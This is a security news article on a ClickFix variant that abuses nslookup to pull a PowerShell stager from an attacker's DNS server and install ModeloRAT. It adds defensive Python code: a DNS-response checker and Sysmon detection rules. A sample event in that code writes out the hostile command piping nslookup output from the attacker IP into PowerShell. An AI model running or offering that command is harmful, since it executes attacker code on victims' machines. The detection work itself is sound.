New ClickFix Attack Exploits nslookup to Fetch PowerShell Payload via DNS Queries
ClickFix Social Engineering Attack Evolves with DNS Queries
A new variant of the ClickFix social engineering attack has emerged, leveraging DNS queries to deliver malware payloads. This novel technique marks the first known instance of DNS being used as a channel in these campaigns.
Typical ClickFix Attacks
Typically, ClickFix attacks trick the victim into copying a command and running it themselves, usually in the Windows Run dialog or a terminal, under the guise of fixing an error, installing an update, or enabling some piece of functionality. Because the user launches the command, nothing has to get past a browser exploit or an email attachment filter.
New Variant
However, in this latest variant the second-stage payload is not downloaded over HTTP at all: it is fetched through a DNS lookup against an attacker-controlled DNS server.
The attack begins with the victim being instructed to run a command built around the nslookup tool. The command names the attacker's DNS server explicitly, so the query goes to that server rather than to the resolver configured on the system.
It is the DNS response, not the query, that carries the malicious PowerShell script; the command then executes that script on the device to install malware.
The command is entered in the Windows Run dialog and issues a lookup for the hostname “example.com” against the threat actor's DNS server at 84[.]21[.]189[.]20.
The “Name:” field of the response (the answer name as nslookup prints it) holds the second-stage PowerShell payload, which is executed on the device.
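The answer name is the only part of a DNS response that nslookup echoes verbatim, and a label on the wire may contain any octet, so nothing stops a server from returning script text where a hostname belongs. The Python below is an added example, not code from the article or from the campaign; it parses a DNS response in wire format and flags any owner name or CNAME target that contains characters a hostname cannot. The article does not say which record type carried the payload, so the sample responses, built inline here rather than captured, assume a CNAME answer and a made-up second stage; the "example.com" query name and the attacker's use of the name field are from the article.

```python
import re
import struct

# RFC 1123 hostname label: letters, digits, hyphens, 1-63 chars, no edge hyphen.
HOSTNAME_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def _read_name(msg, off):
    """Decode a DNS name at offset off, following compression pointers.
    Returns (list of raw label bytes, offset just past the name at the
    position where reading started)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        labels.append(msg[off + 1:off + 1 + length])
        off += 1 + length
    return labels, (end if end is not None else off)


def parse_answers(msg):
    """Parse the answer section of a wire-format DNS response."""
    qdcount, ancount = struct.unpack("!HH", msg[4:8])
    off = 12
    for _ in range(qdcount):                           # skip the question section
        _, off = _read_name(msg, off)
        off += 4                                       # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rec = {"name": name, "type": rtype, "target": []}
        if rtype == 5:                                 # CNAME: RDATA is itself a name
            rec["target"], _ = _read_name(msg, off)
        off += rdlen
        answers.append(rec)
    return answers


def suspicious_names(msg):
    """Return every answer owner name or CNAME target containing something a
    hostname cannot hold (spaces, quotes, '$', parentheses, ...). Script text
    smuggled into the name field, as in this ClickFix variant, trips the check."""
    flagged = []
    for rec in parse_answers(msg):
        for labels in (rec["name"], rec["target"]):
            if labels and not all(HOSTNAME_LABEL.match(l.decode("latin-1")) for l in labels):
                flagged.append(b".".join(labels).decode("latin-1"))
    return flagged


# --- constructed sample responses (not captured traffic) ---
def _encode(labels):
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"


def build_cname_response(qlabels, target_labels, txid=0x1234):
    """Minimal response: one A question, one CNAME answer whose owner name is a
    compression pointer (0xC00C) back to the question name at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = _encode(qlabels) + struct.pack("!HH", 1, 1)
    rdata = _encode(target_labels)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 5, 1, 60, len(rdata)) + rdata
    return header + question + answer


BENIGN = build_cname_response([b"www", b"example", b"com"], [b"cdn", b"example", b"net"])
# Hypothetical second stage riding in the CNAME target as a single label (63 bytes max per label).
STAGE2 = b'powershell -nop -c "Write-Host stage2"'
MALICIOUS = build_cname_response([b"example", b"com"], [STAGE2])

if __name__ == "__main__":
    print("benign   :", suspicious_names(BENIGN))      # []
    print("malicious:", suspicious_names(MALICIOUS))   # the smuggled script text
```

Two caveats for anyone turning this into a resolver-side or IDS check. First, underscore labels (`_dmarc`, `_sip._tcp`) are legitimate and fail the strict RFC 1123 regex, so widen the allowed character set for those record types rather than drop the check. Second, a DNS name is capped at 255 octets and a label at 63, so whatever rides in the name field is necessarily a short loader that fetches or decodes the real payload; the DNS stage is a stager, not the malware itself.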
This payload establishes persistence by writing a VBScript file to disk and creating a shortcut that launches the script on startup.
The final payload is a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems remotely.
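Every step of the chain above leaves endpoint telemetry: a Run-dialog command has explorer.exe as its parent, nslookup is invoked with an explicit foreign server, its output is handed to PowerShell, and a shortcut or VBScript lands in a Startup folder. The Python below is an added example, not code from the article or from any security vendor; it runs four rules over constructed Sysmon-style records (Event ID 1 ProcessCreate fields Image, ParentImage, CommandLine; Event ID 11 FileCreate field TargetFilename). The resolver allowlist and the sample events are assumptions, and so is the exact shape of the Run-dialog command (nslookup piped into powershell); the article does not reproduce it.

```python
import re

# Constructed allowlist: the resolvers this organisation actually uses.
# An nslookup whose second positional argument is anything else is talking
# to a foreign DNS server, which is the heart of this ClickFix variant.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Files written to a Startup folder run at logon (the article describes a
# shortcut plus a VBScript); these extensions cover the usual droppers.
STARTUP_ARTIFACT = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(lnk|vbs|vbe|js|bat|cmd|ps1)$", re.I)

PIPED_TO_POWERSHELL = re.compile(r"\|\s*(powershell|pwsh)(\.exe)?\b", re.I)


def nslookup_args(cmdline):
    """Return (host, server) for the first nslookup in cmdline, or None when
    there is none. nslookup's dash options (-type=mx, -port=...) are skipped
    and parsing stops at a pipe or redirection. server is None when the
    system resolver would be used."""
    m = re.search(r"\bnslookup(?:\.exe)?\b(.*)", cmdline, re.I)
    if not m:
        return None
    rest = re.split(r"[|&>]", m.group(1))[0]
    tokens = [t.strip('"') for t in rest.split()]
    positional = [t for t in tokens if t and not t.startswith("-")]
    host = positional[0] if positional else None
    server = positional[1] if len(positional) > 1 else None
    return host, server


def findings_for(event):
    """Apply the detection rules to one Sysmon-style event record."""
    out = []
    if event["EventID"] == 1:                          # ProcessCreate
        cmd = event.get("CommandLine", "")
        args = nslookup_args(cmd)
        if args:
            host, server = args
            if server and server not in APPROVED_RESOLVERS:
                out.append(("T1", f"nslookup for {host} sent to non-approved server {server}"))
            if PIPED_TO_POWERSHELL.search(cmd):
                out.append(("T2", "nslookup output piped into PowerShell"))
            if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
                out.append(("T3", "nslookup chain launched from explorer.exe (Run dialog)"))
    elif event["EventID"] == 11:                       # FileCreate
        target = event.get("TargetFilename", "")
        if STARTUP_ARTIFACT.search(target):
            out.append(("T4", f"Startup-folder persistence artifact: {target}"))
    return out


def analyze(events):
    """Return (RecordId, rule, description) for every rule hit, in event order."""
    return [(e["RecordId"], rule, desc) for e in events for rule, desc in findings_for(e)]


# Constructed sample telemetry, not real logs. Record 1 models the Run-dialog
# command (assumed shape); records 2 and 4 are benign controls.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "nslookup example.com 84.21.189.20 | powershell -nop -"'},
    {"RecordId": 2, "EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup -type=mx corp.example 10.0.0.53"},
    {"RecordId": 3, "EventID": 11,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"RecordId": 4, "EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for rec_id, rule, desc in analyze(SAMPLE_EVENTS):
        print(f"record {rec_id} {rule}: {desc}")
```

T1 on its own fires on administrators debugging a resolver, so in production weight it by T2 and T3 co-occurring in the same process tree: nslookup run by hand from a terminal is routine, nslookup spawned under explorer.exe with its output fed to PowerShell is not.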
Evolution of ClickFix Attacks
From the network's point of view the victim sends an ordinary DNS query and receives an ordinary DNS response, so the technique blends in with normal DNS traffic, and the attacker can change the payload at any time simply by editing what the server answers. The weak points are on the endpoint and at the egress: an nslookup launched from the Run dialog with an explicit non-corporate server, its output handed to PowerShell, and port 53 traffic to a resolver the organisation does not sanction are all observable, and forcing all outbound DNS through sanctioned resolvers breaks the channel entirely.
ClickFix attacks have rapidly evolved over the past year, with threat actors experimenting with new delivery tactics and payload types targeting various operating systems.
Previous ClickFix campaigns relied on convincing users to execute PowerShell or shell commands directly on their operating systems to install malware.
However, recent campaigns have expanded their techniques beyond traditional malware payload delivery over the web.
For instance, a recent ClickFix attack called “ConsentFix” abuses the Azure CLI OAuth app to hijack Microsoft accounts without a password and bypass multi-factor authentication.
Conclusion
The use of DNS as a communication and staging channel in this latest ClickFix variant highlights how quickly these attacks evolve once the initial foothold is a user pasting a command.
As threat actors continue to experiment with new delivery channels, organisations should treat the pasted command itself as the thing to defend against: train staff that no legitimate fix asks them to paste a command into the Run dialog, alert on PowerShell and nslookup chains spawned from explorer.exe, and restrict outbound DNS to sanctioned resolvers so a lookup against an arbitrary server never reaches it.
